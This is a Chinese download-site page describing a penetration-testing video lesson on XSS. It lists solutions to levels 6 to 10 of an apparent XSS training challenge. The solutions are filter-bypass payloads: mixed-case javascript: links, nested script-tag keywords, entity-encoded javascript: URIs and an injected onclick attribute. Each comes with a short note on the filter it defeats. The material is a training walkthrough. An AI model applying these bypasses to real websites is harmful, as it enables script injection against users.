您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第十七课:xss实战练习二
实战渗透测试第十七课:xss实战练习二
软件大小:30.7 MB
更新时间:2016-11-04 02:21
授权方式:共享版
人气访问:203次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第十七课:xss实战练习二介绍

讲师:上善若水

动画名称:第十七课  xss练习(2)


测试环境:Windows xp 系统


第六关:"><a hrEf=javascript:alert(/xss/)>xss</a>    与第五关一样,只不过是对可以引用的标签里的关键字进行了下划线转义,利用大小写转换即可

第七关:"><scrscriptipt>alert(%2Fxss%2F)<%2Fscrscriptipt><"  对script关键字转义为空


注:<script><>验证做了几次过滤<script>


第八关:java&#115cript:alert(1)         过滤<> 双引号  对javascript进行下划线转义 利用编码即可


第九关:java&#115cript:alert('http://')    与第八关一样,只不过必须要有http://协议


注:在html中添加url链接必须以http://协义开头


第十关:fwfw&t_sort=" type=text onclick="alert(/xss/)"   过滤了<> 但是有隐藏域标签 要用&符号连接一个隐藏域中的name变量传值

实战渗透测试第十七课:xss实战练习二下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号